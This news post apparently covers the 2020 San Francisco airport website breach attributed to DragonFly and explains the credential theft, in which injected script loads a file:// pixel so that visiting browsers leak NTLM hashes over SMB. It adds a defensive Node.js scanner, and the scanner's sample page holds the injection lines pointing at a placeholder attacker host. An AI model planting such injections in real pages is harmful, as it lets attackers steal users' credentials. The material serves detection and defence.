DragonFly Linked to San Francisco Airport Attacks

Delaware, USA – April 17, 2020 – The websites of the San Francisco International Airport used by airport employees and construction contractors became the targets of a cyber attack in March 2020. The airport management reported the incident on the official website: “The attackers inserted malicious computer code on these websites to steal some users’ login credentials. Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.” ESET researchers said that the main suspect in these attacks is the Russian state-sponsored group DragonFly, also known as Energetic Bear. After compromising the sites, the attackers injected JavaScript that loaded a single-pixel image from a file:// URL pointing at a server under their control. Windows treats such a URL as a reference to an SMB share, so Internet Explorer silently tried to authenticate to the attackers' server over SMB, handing over the user's account name and NTLM password hash (the challenge-response), which attackers can crack offline or relay to other services. The leak requires no action from the user beyond loading the page. With working credentials, DragonFly could gain a foothold in the San Francisco International Airport network to install malware or steal valuable information.
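The following is an added example, not code from the original article or from ESET's or SOC Prime's research: a small Node.js scanner that flags the kind of injection described above. It looks for src/href attributes and inline-script string literals that point at file:// URLs or UNC paths, since either makes a Windows browser open an SMB connection and attempt NTLM authentication to the named host. The sample page and the host 203.0.113.10 are constructed for illustration and are not taken from the SFO incident.

```javascript
// Added example: scanner for file:// and UNC references that trigger SMB/NTLM
// authentication from a Windows browser. Not from the original article.
// The sample page and host 203.0.113.10 (TEST-NET-3) are constructed for illustration.

// Attributes that make the browser fetch a resource automatically.
const SRC_ATTR_RE =
  /<(img|script|iframe|link|source|video|audio)\b[^>]*?\b(src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
// Inline scripts, whose bodies may build the image dynamically (new Image().src = ...).
const SCRIPT_RE = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
// file:// URLs written as JS string literals inside those scripts.
const FILE_LITERAL_RE = /["'`](file:\/\/[^"'`]*)["'`]/gi;

// Returns 'file-url', 'unc-path' or null for a resource reference.
function classifyUrl(value) {
  const v = value.trim();
  if (/^file:\/\//i.test(v)) return 'file-url';
  if (/^\\\\[^\\]+\\/.test(v)) return 'unc-path'; // \\host\share\...
  return null;
}

// Host the SMB connection would be made to (what you would block or hunt for).
function extractHost(value, kind) {
  const v = value.trim();
  const m = kind === 'file-url' ? /^file:\/\/([^/\\]*)/i.exec(v) : /^\\\\([^\\]+)/.exec(v);
  return m ? m[1] : '';
}

// Pass 1: static markup with src/href pointing at SMB-resolvable locations.
function findAttributeLeaks(html) {
  const findings = [];
  SRC_ATTR_RE.lastIndex = 0;
  let m;
  while ((m = SRC_ATTR_RE.exec(html)) !== null) {
    const value = m[3] || m[4] || m[5] || '';
    const kind = classifyUrl(value);
    if (kind) {
      findings.push({
        tag: m[1].toLowerCase(),
        attr: m[2].toLowerCase(),
        value,
        kind,
        host: extractHost(value, kind),
      });
    }
  }
  return findings;
}

// Pass 2: file:// literals inside inline scripts (the dynamic-injection variant).
function findScriptLeaks(html) {
  const findings = [];
  SCRIPT_RE.lastIndex = 0;
  let s;
  while ((s = SCRIPT_RE.exec(html)) !== null) {
    FILE_LITERAL_RE.lastIndex = 0;
    let m;
    while ((m = FILE_LITERAL_RE.exec(s[1])) !== null) {
      findings.push({ value: m[1], kind: 'file-url', host: extractHost(m[1], 'file-url') });
    }
  }
  return findings;
}

// Combined report: individual findings plus the unique hosts to block or hunt for.
function reportSmbLeaks(html) {
  const attributeFindings = findAttributeLeaks(html);
  const scriptFindings = findScriptLeaks(html);
  const hosts = [...new Set([...attributeFindings, ...scriptFindings].map((f) => f.host).filter(Boolean))];
  return { attributeFindings, scriptFindings, hosts };
}

// Constructed sample: a benign page with one injected pixel and one dynamic variant.
const SAMPLE_PAGE = `<html><body>
<img src="/static/logo.png">
<script src="https://cdn.example.com/app.js"></script>
<img src="file://203.0.113.10/share/pixel.png" width="1" height="1">
<script>var i = new Image(); i.src = 'file://203.0.113.10/share/pixel.png';</script>
</body></html>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(reportSmbLeaks(SAMPLE_PAGE), null, 2));
}
```

The scanner only reads markup and inline script text; obfuscated injections (hex-encoded or concatenated strings) will evade it, so treat it as a triage aid for sweeping a site's pages, not as proof of absence. The leak itself is stopped on the network side by blocking outbound TCP 445 at the perimeter and on the endpoint by restricting outgoing NTLM authentication through the Group Policy setting "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers".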

DragonFly APT has been active since at least 2010; its primary targets are energy, aviation, and industrial companies in the USA and Europe. The group has repeatedly carried out watering hole attacks using exactly this credential-harvesting technique to obtain the credentials needed to penetrate a target's network. It is not known whether the attackers managed to penetrate the airport network, or whether San Francisco International Airport was their only target. You can learn more about the group's techniques and tools using the mobile-friendly MITRE ATT&CK map: https://attack.socprime.com/#!/